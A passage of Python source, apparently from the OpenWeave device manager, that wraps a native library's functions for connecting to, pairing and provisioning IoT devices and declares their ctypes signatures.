lambda: _dmLib.nl_Weave_DeviceManager_SetRendezvousAddress(self.devMgr, _StringToCString(addr), _StringToCString(intf))
)
if (res != 0):
raise self._ErrorToException(res)
def SetConnectTimeout(self, timeoutMS):
if timeoutMS < 0 or timeoutMS > pow(2,32):
raise ValueError("timeoutMS must be an unsigned 32-bit integer")
res = self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_SetConnectTimeout(self.devMgr, timeoutMS)
)
if (res != 0):
raise self._ErrorToException(res)
def SetAutoReconnect(self, autoReconnect):
res = self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_SetAutoReconnect(self.devMgr, autoReconnect)
)
if (res != 0):
raise self._ErrorToException(res)
def SetRendezvousLinkLocal(self, RendezvousLinkLocal):
res = self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_SetRendezvousLinkLocal(self.devMgr, RendezvousLinkLocal)
)
if (res != 0):
raise self._ErrorToException(res)
def StartDeviceEnumeration(self, targetFabricId=TargetFabricId_AnyFabric,
targetModes=TargetDeviceMode_Any,
targetVendorId=TargetVendorId_Any,
targetProductId=TargetProductId_Any,
targetDeviceId=TargetDeviceId_Any):
deviceCriteria = _IdentifyDeviceCriteriaStruct()
deviceCriteria.TargetFabricId = targetFabricId
deviceCriteria.TargetModes = targetModes
deviceCriteria.TargetVendorId = targetVendorId
deviceCriteria.TargetProductId = targetProductId
deviceCriteria.TargetDeviceId = targetDeviceId
self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_StartDeviceEnumeration(self.devMgr, deviceCriteria, self.cbHandleDeviceEnumerationResponse, self.cbHandleError)
)
def StopDeviceEnumeration(self):
        self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_StopDeviceEnumeration(self.devMgr)
)
def ConnectDevice(self, deviceId, deviceAddr=None,
pairingCode=None, accessToken=None):
if deviceAddr is not None and '\x00' in deviceAddr:
raise ValueError("Unexpected NUL character in deviceAddr")
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode != None and accessToken != None):
raise ValueError('Must specify only one of pairingCode or accessToken when calling WeaveDeviceManager.ConnectDevice')
if (pairingCode == None and accessToken == None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ConnectDevice_NoAuth(self.devMgr, deviceId, _StringToCString(deviceAddr), self.cbHandleComplete, self.cbHandleError)
)
elif (pairingCode != None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ConnectDevice_PairingCode(self.devMgr, deviceId, _StringToCString(deviceAddr), _StringToCString(pairingCode), self.cbHandleComplete, self.cbHandleError)
)
else:
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ConnectDevice_AccessToken(self.devMgr, deviceId, _StringToCString(deviceAddr), _ByteArrayToVoidPtr(accessToken), len(accessToken), self.cbHandleComplete, self.cbHandleError)
)
def RendezvousDevice(self, pairingCode=None, accessToken=None,
targetFabricId=TargetFabricId_AnyFabric,
targetModes=TargetDeviceMode_Any,
targetVendorId=TargetVendorId_Any,
targetProductId=TargetProductId_Any,
targetDeviceId=TargetDeviceId_Any):
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode != None and accessToken != None):
raise ValueError('Must specify only one of pairingCode or accessToken when calling WeaveDeviceManager.RendezvousDevice')
deviceCriteria = _IdentifyDeviceCriteriaStruct()
deviceCriteria.TargetFabricId = targetFabricId
deviceCriteria.TargetModes = targetModes
deviceCriteria.TargetVendorId = targetVendorId
deviceCriteria.TargetProductId = targetProductId
deviceCriteria.TargetDeviceId = targetDeviceId
if (pairingCode == None and accessToken == None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_RendezvousDevice_NoAuth(self.devMgr, deviceCriteria, self.cbHandleComplete, self.cbHandleError)
)
elif (pairingCode != None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_RendezvousDevice_PairingCode(self.devMgr, _StringToCString(pairingCode), deviceCriteria, self.cbHandleComplete, self.cbHandleError)
)
else:
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_RendezvousDevice_AccessToken(self.devMgr, _ByteArrayToVoidPtr(accessToken), len(accessToken), deviceCriteria, self.cbHandleComplete, self.cbHandleError)
)
    # Methods for testing BLE performance; these are not part of the Weave Device Manager API and are considered internal.
def TestBle(self, connObj, count, duration, delay, ack, size, rx):
res = self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_TestBle(self.devMgr, connObj, self.cbHandleComplete, self.cbHandleError, count, duration, delay, ack, size, rx)
)
if (res != 0):
raise self._ErrorToException(res)
def TestResultBle(self, connObj, local):
res = self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_TestResultBle(self.devMgr, connObj, local)
)
if (res != 0):
raise self._ErrorToException(res)
def TestAbortBle(self, connObj):
res = self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_TestAbortBle(self.devMgr, connObj)
)
if (res != 0):
raise self._ErrorToException(res)
def TxTimingBle(self, connObj, enabled, remote):
res = self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_TxTimingBle(self.devMgr, connObj, enabled, remote)
)
if (res != 0):
raise self._ErrorToException(res)
# end of BLE testing methods
def ConnectBle(self, bleConnection, pairingCode=None, accessToken=None):
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode != None and accessToken != None):
raise ValueError('Must specify only one of pairingCode or accessToken when calling WeaveDeviceManager.ConnectBle')
if (pairingCode == None and accessToken == None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ConnectBle_NoAuth(self.devMgr, bleConnection, self.cbHandleComplete, self.cbHandleError)
)
elif (pairingCode != None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ConnectBle_PairingCode(self.devMgr, bleConnection, _StringToCString(pairingCode), self.cbHandleComplete, self.cbHandleError)
)
else:
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ConnectBle_AccessToken(self.devMgr, bleConnection, _ByteArrayToVoidPtr(accessToken), len(accessToken), self.cbHandleComplete, self.cbHandleError)
)
def PassiveRendezvousDevice(self, pairingCode=None, accessToken=None):
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode != None and accessToken != None):
raise ValueError('Must specify only one of pairingCode or accessToken when calling WeaveDeviceManager.PassiveRendezvousDevice')
if (pairingCode == None and accessToken == None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_NoAuth(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
elif (pairingCode != None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_PairingCode(self.devMgr, _StringToCString(pairingCode), self.cbHandleComplete, self.cbHandleError)
)
else:
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_AccessToken(self.devMgr, _ByteArrayToVoidPtr(accessToken), len(accessToken), self.cbHandleComplete, self.cbHandleError)
)
def RemotePassiveRendezvous(self, rendezvousDeviceAddr=None, pairingCode=None, accessToken=None, rendezvousTimeout=None, inactivityTimeout=None):
if rendezvousDeviceAddr == None:
rendezvousDeviceAddr = "::"
if '\x00' in rendezvousDeviceAddr:
raise ValueError("Unexpected NUL character in rendezvousDeviceAddr")
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode == None and accessToken == None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_NoAuth(self.devMgr, _StringToCString(rendezvousDeviceAddr), rendezvousTimeout, inactivityTimeout, self.cbHandleComplete, self.cbHandleError)
)
elif (pairingCode != None):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_PASEAuth(self.devMgr, _StringToCString(rendezvousDeviceAddr), _StringToCString(pairingCode), rendezvousTimeout, inactivityTimeout, self.cbHandleComplete, self.cbHandleError)
)
else:
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_CASEAuth(self.devMgr, _StringToCString(rendezvousDeviceAddr), _ByteArrayToVoidPtr(accessToken), len(accessToken), rendezvousTimeout, inactivityTimeout, self.cbHandleComplete, self.cbHandleError)
)
def ReconnectDevice(self):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ReconnectDevice(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
def Close(self):
self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_Close(self.devMgr)
)
def EnableConnectionMonitor(self, interval, timeout):
        if interval < 0 or interval > pow(2,16):
            raise ValueError("interval must be an unsigned 16-bit integer")
        if timeout < 0 or timeout > pow(2,16):
            raise ValueError("timeout must be an unsigned 16-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_EnableConnectionMonitor(self.devMgr, interval, timeout, self.cbHandleComplete, self.cbHandleError)
)
def DisableConnectionMonitor(self):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_DisableConnectionMonitor(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
def IdentifyDevice(self):
def HandleIdentifyDeviceComplete(devMgr, reqState, deviceDescPtr):
self.callbackRes = deviceDescPtr.contents.toDeviceDescriptor()
self.completeEvent.set()
cbHandleIdentifyDeviceComplete = _IdentifyDeviceCompleteFunct(HandleIdentifyDeviceComplete)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_IdentifyDevice(self.devMgr, cbHandleIdentifyDeviceComplete, self.cbHandleError)
)
def PairToken(self, pairingToken):
def HandlePairTokenComplete(devMgr, reqState, tokenPairingBundlePtr, tokenPairingBundleLen):
self.callbackRes = _VoidPtrToByteArray(tokenPairingBundlePtr, tokenPairingBundleLen)
self.completeEvent.set()
cbHandlePairTokenComplete = _PairTokenCompleteFunct(HandlePairTokenComplete)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_PairToken(self.devMgr, _ByteArrayToVoidPtr(pairingToken), len(pairingToken), cbHandlePairTokenComplete, self.cbHandleError)
)
def UnpairToken(self):
def HandleUnpairTokenComplete(devMgr, reqState):
self.callbackRes = True
self.completeEvent.set()
cbHandleUnpairTokenComplete = _UnpairTokenCompleteFunct(HandleUnpairTokenComplete)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_UnpairToken(self.devMgr, cbHandleUnpairTokenComplete, self.cbHandleError)
)
def ScanNetworks(self, networkType):
def HandleScanNetworksComplete(devMgr, reqState, netCount, netInfoPtr):
self.callbackRes = [ netInfoPtr[i].toNetworkInfo() for i in range(netCount) ]
self.completeEvent.set()
cbHandleScanNetworksComplete = _NetworkScanCompleteFunct(HandleScanNetworksComplete)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ScanNetworks(self.devMgr, networkType, cbHandleScanNetworksComplete, self.cbHandleError)
)
def GetNetworks(self, getFlags):
def HandleGetNetworksComplete(devMgr, reqState, netCount, netInfoPtr):
self.callbackRes = [ netInfoPtr[i].toNetworkInfo() for i in range(netCount) ]
self.completeEvent.set()
cbHandleGetNetworksComplete = _GetNetworksCompleteFunct(HandleGetNetworksComplete)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_GetNetworks(self.devMgr, getFlags, cbHandleGetNetworksComplete, self.cbHandleError)
)
def GetCameraAuthData(self, nonce):
if nonce is not None and '\x00' in nonce:
raise ValueError("Unexpected NUL character in nonce")
def HandleGetCameraAuthDataComplete(devMgr, reqState, macAddress, signedCameraPayload):
self.callbackRes = [ _CStringToString(macAddress), _CStringToString(signedCameraPayload) ]
self.completeEvent.set()
cbHandleGetCameraAuthDataComplete = _GetCameraAuthDataCompleteFunct(HandleGetCameraAuthDataComplete)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_GetCameraAuthData(self.devMgr, _StringToCString(nonce), cbHandleGetCameraAuthDataComplete, self.cbHandleError)
)
def AddNetwork(self, networkInfo):
def HandleAddNetworkComplete(devMgr, reqState, networkId):
self.callbackRes = networkId
self.completeEvent.set()
cbHandleAddNetworkComplete = _AddNetworkCompleteFunct(HandleAddNetworkComplete)
networkInfoStruct = _NetworkInfoStruct.fromNetworkInfo(networkInfo)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_AddNetwork(self.devMgr, networkInfoStruct, cbHandleAddNetworkComplete, self.cbHandleError)
)
def UpdateNetwork(self, networkInfo):
networkInfoStruct = _NetworkInfoStruct.fromNetworkInfo(networkInfo)
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_UpdateNetwork(self.devMgr, networkInfoStruct, self.cbHandleComplete, self.cbHandleError)
)
def RemoveNetwork(self, networkId):
if networkId < 0 or networkId > pow(2,32):
raise ValueError("networkId must be an unsigned 32-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_RemoveNetwork(self.devMgr, networkId, self.cbHandleComplete, self.cbHandleError)
)
def EnableNetwork(self, networkId):
if networkId < 0 or networkId > pow(2,32):
raise ValueError("networkId must be an unsigned 32-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_EnableNetwork(self.devMgr, networkId, self.cbHandleComplete, self.cbHandleError)
)
def DisableNetwork(self, networkId):
if networkId < 0 or networkId > pow(2,32):
raise ValueError("networkId must be an unsigned 32-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_DisableNetwork(self.devMgr, networkId, self.cbHandleComplete, self.cbHandleError)
)
def TestNetworkConnectivity(self, networkId):
if networkId < 0 or networkId > pow(2,32):
raise ValueError("networkId must be an unsigned 32-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_TestNetworkConnectivity(self.devMgr, networkId, self.cbHandleComplete, self.cbHandleError)
)
def GetRendezvousMode(self):
def HandleGetRendezvousModeComplete(devMgr, reqState, modeFlags):
self.callbackRes = modeFlags
self.completeEvent.set()
cbHandleGetRendezvousModeComplete = _GetRendezvousModeCompleteFunct(HandleGetRendezvousModeComplete)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_GetRendezvousMode(self.devMgr, cbHandleGetRendezvousModeComplete, self.cbHandleError)
)
def SetRendezvousMode(self, modeFlags):
if modeFlags < 0 or modeFlags > pow(2,16):
raise ValueError("modeFlags must be an unsigned 16-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_SetRendezvousMode(self.devMgr, modeFlags, self.cbHandleComplete, self.cbHandleError)
)
def GetLastNetworkProvisioningResult(self):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_GetLastNetworkProvisioningResult(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
def CreateFabric(self):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_CreateFabric(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
def LeaveFabric(self):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_LeaveFabric(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
def GetFabricConfig(self):
def HandleGetFabricConfigComplete(devMgr, reqState, fabricConfigPtr, fabricConfigLen):
self.callbackRes = _VoidPtrToByteArray(fabricConfigPtr, fabricConfigLen)
self.completeEvent.set()
cbHandleGetFabricConfigComplete = _GetFabricConfigCompleteFunct(HandleGetFabricConfigComplete)
return self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_GetFabricConfig(self.devMgr, cbHandleGetFabricConfigComplete, self.cbHandleError)
)
def JoinExistingFabric(self, fabricConfig):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_JoinExistingFabric(self.devMgr, _ByteArrayToVoidPtr(fabricConfig), len(fabricConfig),
self.cbHandleComplete, self.cbHandleError)
)
def Ping(self):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_Ping(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
def RegisterServicePairAccount(self, serviceId, accountId, serviceConfig, pairingToken, pairingInitData):
if accountId is not None and '\x00' in accountId:
raise ValueError("Unexpected NUL character in accountId")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_RegisterServicePairAccount(self.devMgr, serviceId, _StringToCString(accountId),
_ByteArrayToVoidPtr(serviceConfig), len(serviceConfig),
_ByteArrayToVoidPtr(pairingToken), len(pairingToken),
_ByteArrayToVoidPtr(pairingInitData), len(pairingInitData),
self.cbHandleComplete, self.cbHandleError)
)
def UpdateService(self, serviceId, serviceConfig):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_UpdateService(self.devMgr, serviceId, _ByteArrayToVoidPtr(serviceConfig),
len(serviceConfig), self.cbHandleComplete, self.cbHandleError)
)
def UnregisterService(self, serviceId):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_UnregisterService(self.devMgr, serviceId, self.cbHandleComplete, self.cbHandleError)
)
def ArmFailSafe(self, armMode, failSafeToken):
if armMode < 0 or armMode > pow(2, 8):
raise ValueError("armMode must be an unsigned 8-bit integer")
if failSafeToken < 0 or failSafeToken > pow(2, 32):
raise ValueError("failSafeToken must be an unsigned 32-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ArmFailSafe(self.devMgr, armMode, failSafeToken, self.cbHandleComplete, self.cbHandleError)
)
def DisarmFailSafe(self):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_DisarmFailSafe(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
def ResetConfig(self, resetFlags):
if resetFlags < 0 or resetFlags > pow(2, 16):
raise ValueError("resetFlags must be an unsigned 16-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_ResetConfig(self.devMgr, resetFlags, self.cbHandleComplete, self.cbHandleError)
)
def CloseEndpoints(self):
self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_CloseEndpoints()
)
def Shutdown(self):
self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_Shutdown()
)
def SetLogFilter(self, category):
if category < 0 or category > pow(2, 8):
raise ValueError("category must be an unsigned 8-bit integer")
self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_SetLogFilter(category)
)
def GetLogFilter(self):
self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_GetLogFilter()
)
def SetBlockingCB(self, blockingCB):
self.blockingCB = blockingCB
def StartSystemTest(self, profileId, testId):
if profileId < 0 or profileId > pow(2, 32):
raise ValueError("profileId must be an unsigned 32-bit integer")
if testId < 0 or testId > pow(2, 32):
raise ValueError("testId must be an unsigned 32-bit integer")
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_StartSystemTest(self.devMgr, profileId, testId, self.cbHandleComplete, self.cbHandleError)
)
def StopSystemTest(self):
self._CallDevMgrAsync(
lambda: _dmLib.nl_Weave_DeviceManager_StopSystemTest(self.devMgr, self.cbHandleComplete, self.cbHandleError)
)
# ----- Private Members -----
def _InitLib(self):
global _dmLib
if (_dmLib == None):
_dmLib = CDLL(_LocateWeaveDLL())
_dmLib.nl_Weave_DeviceManager_Init.argtypes = [ ]
_dmLib.nl_Weave_DeviceManager_Init.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_Shutdown.argtypes = [ ]
_dmLib.nl_Weave_DeviceManager_Shutdown.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_NewDeviceManager.argtypes = [ POINTER(c_void_p) ]
_dmLib.nl_Weave_DeviceManager_NewDeviceManager.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_DeleteDeviceManager.argtypes = [ c_void_p ]
_dmLib.nl_Weave_DeviceManager_DeleteDeviceManager.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_Close.argtypes = [ c_void_p ]
_dmLib.nl_Weave_DeviceManager_Close.restype = None
_dmLib.nl_Weave_DeviceManager_DriveIO.argtypes = [ c_uint32 ]
_dmLib.nl_Weave_DeviceManager_DriveIO.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_WakeForBleIO.argtypes = [ ]
_dmLib.nl_Weave_DeviceManager_WakeForBleIO.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetBleEventCB.argtypes = [ _GetBleEventFunct ]
_dmLib.nl_Weave_DeviceManager_SetBleEventCB.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetBleWriteCharacteristic.argtypes = [ _WriteBleCharacteristicFunct ]
_dmLib.nl_Weave_DeviceManager_SetBleWriteCharacteristic.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetBleSubscribeCharacteristic.argtypes = [ _SubscribeBleCharacteristicFunct ]
_dmLib.nl_Weave_DeviceManager_SetBleSubscribeCharacteristic.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetBleClose.argtypes = [ _CloseBleFunct ]
_dmLib.nl_Weave_DeviceManager_SetBleClose.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_IsConnected.argtypes = [ c_void_p ]
_dmLib.nl_Weave_DeviceManager_IsConnected.restype = c_bool
_dmLib.nl_Weave_DeviceManager_DeviceId.argtypes = [ c_void_p ]
_dmLib.nl_Weave_DeviceManager_DeviceId.restype = c_uint64
_dmLib.nl_Weave_DeviceManager_DeviceAddress.argtypes = [ c_void_p ]
_dmLib.nl_Weave_DeviceManager_DeviceAddress.restype = c_char_p
_dmLib.nl_Weave_DeviceManager_StartDeviceEnumeration.argtypes = [ c_void_p, POINTER(_IdentifyDeviceCriteriaStruct), _DeviceEnumerationResponseFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_StartDeviceEnumeration.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_StopDeviceEnumeration.argtypes = [ c_void_p ]
_dmLib.nl_Weave_DeviceManager_StopDeviceEnumeration.restype = None
_dmLib.nl_Weave_DeviceManager_ConnectDevice_NoAuth.argtypes = [ c_void_p, c_uint64, c_char_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ConnectDevice_NoAuth.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ConnectDevice_PairingCode.argtypes = [ c_void_p, c_uint64, c_char_p, c_char_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ConnectDevice_PairingCode.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ConnectDevice_AccessToken.argtypes = [ c_void_p, c_uint64, c_char_p, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ConnectDevice_AccessToken.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_RendezvousDevice_NoAuth.argtypes = [ c_void_p, POINTER(_IdentifyDeviceCriteriaStruct), _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_RendezvousDevice_NoAuth.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_RendezvousDevice_PairingCode.argtypes = [ c_void_p, c_char_p, POINTER(_IdentifyDeviceCriteriaStruct), _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_RendezvousDevice_PairingCode.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_RendezvousDevice_AccessToken.argtypes = [ c_void_p, c_void_p, c_uint32, POINTER(_IdentifyDeviceCriteriaStruct), _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_RendezvousDevice_AccessToken.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_NoAuth.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_NoAuth.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_PairingCode.argtypes = [ c_void_p, c_char_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_PairingCode.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_AccessToken.argtypes = [ c_void_p, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_AccessToken.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_TestBle.argtypes = [ c_void_p, c_void_p, _CompleteFunct, _ErrorFunct, c_uint32, c_uint32, c_uint16, c_uint8, c_uint16, c_bool ]
_dmLib.nl_Weave_DeviceManager_TestBle.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_TestResultBle.argtypes = [ c_void_p, c_void_p, c_bool ]
_dmLib.nl_Weave_DeviceManager_TestResultBle.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_TestAbortBle.argtypes = [ c_void_p, c_void_p ]
_dmLib.nl_Weave_DeviceManager_TestAbortBle.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_TxTimingBle.argtypes = [ c_void_p, c_void_p, c_bool, c_bool ]
_dmLib.nl_Weave_DeviceManager_TxTimingBle.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ConnectBle_NoAuth.argtypes = [ c_void_p, c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ConnectBle_NoAuth.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ConnectBle_PairingCode.argtypes = [ c_void_p, c_void_p, c_char_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ConnectBle_PairingCode.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ConnectBle_AccessToken.argtypes = [ c_void_p, c_void_p, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ConnectBle_AccessToken.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_CASEAuth.argtypes = [ c_void_p, c_char_p, c_char_p, c_uint32, c_uint16, c_uint16, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_CASEAuth.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_PASEAuth.argtypes = [ c_void_p, c_char_p, c_char_p, c_uint16, c_uint16, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_PASEAuth.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_NoAuth.argtypes = [ c_void_p, c_char_p, c_uint16, c_uint16, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_NoAuth.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ReconnectDevice.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ReconnectDevice.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_EnableConnectionMonitor.argtypes = [ c_void_p, c_uint16, c_uint16, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_EnableConnectionMonitor.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_DisableConnectionMonitor.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_DisableConnectionMonitor.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_IdentifyDevice.argtypes = [ c_void_p, _IdentifyDeviceCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_IdentifyDevice.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_PairToken.argtypes = [ c_void_p, c_void_p, c_uint32, _PairTokenCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_PairToken.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_UnpairToken.argtypes = [ c_void_p, _UnpairTokenCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_UnpairToken.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ScanNetworks.argtypes = [ c_void_p, c_int, _NetworkScanCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ScanNetworks.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_GetNetworks.argtypes = [ c_void_p, c_int, _GetNetworksCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_GetNetworks.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_GetCameraAuthData.argtypes = [ c_void_p, c_char_p, _GetCameraAuthDataCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_GetCameraAuthData.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_AddNetwork.argtypes = [ c_void_p, POINTER(_NetworkInfoStruct), _AddNetworkCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_AddNetwork.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_UpdateNetwork.argtypes = [ c_void_p, POINTER(_NetworkInfoStruct), _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_UpdateNetwork.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_RemoveNetwork.argtypes = [ c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_RemoveNetwork.restype = c_uint32
